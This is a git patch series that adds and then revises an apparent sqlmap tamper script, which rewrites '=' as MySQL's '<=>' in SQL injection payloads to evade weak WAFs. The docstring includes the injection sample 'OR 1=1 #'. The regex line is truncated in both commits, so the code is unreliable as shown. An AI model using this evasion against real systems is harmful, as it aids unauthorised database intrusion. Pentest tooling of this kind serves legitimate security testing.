From d5a95c5a506fbaa3b67cd0cb5764ef0b986fa6fb Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Sat, 12 Jul 2025 08:12:45 -0400 Subject: [PATCH 1/2] Create equal2nullsafequals.py --- tamper/equal2nullsafequals.py | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 tamper/equal2nullsafequals.py diff --git a/tamper/equal2nullsafequals.py b/tamper/equal2nullsafequals.py new file mode 100644 index 0000000000..422f378bed --- /dev/null +++ b/tamper/equal2nullsafequals.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python3 +""" +Tamper script to replace '=' with '<=>' +MySQL-only NULL-safe equality operator. +Useful for bypassing filters that block '='. + +Author: relunsec +""" + +from lib.core.enums import PRIORITY +import re + +__priority__ = PRIORITY.LOW + +def tamper(payload, **kwargs): + """ + Replaces equal signs (=) with MySQL null-safe equal operator (<=>) Sometime bypass Weak WAF/Filters filter (=) sign + + Requirement: + * MySQL + + >>> tamper("OR 1=1 #") + 'OR 1<=>1 #' + """ + if not payload: + return payload + # Replace '=' with '<=>' + payload = re.sub(r'(?', payload) + return payload From 1a71e87ff680aab072b24e85ce1f6b8cbb315abb Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Mon, 14 Jul 2025 12:03:41 -0400 Subject: [PATCH 2/2] Update equal2nullsafequals.py --- tamper/equal2nullsafequals.py | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/tamper/equal2nullsafequals.py b/tamper/equal2nullsafequals.py index 422f378bed..cce4083840 100644 --- a/tamper/equal2nullsafequals.py +++ b/tamper/equal2nullsafequals.py @@ -22,8 +22,6 @@ def tamper(payload, **kwargs): >>> tamper("OR 1=1 #") 'OR 1<=>1 #' """ - if not payload: - return payload - # Replace '=' with '<=>' - payload = re.sub(r'(?', payload) - return payload + if payload: + # Replace '=' with '<=>' + return re.sub(r'(?', payload)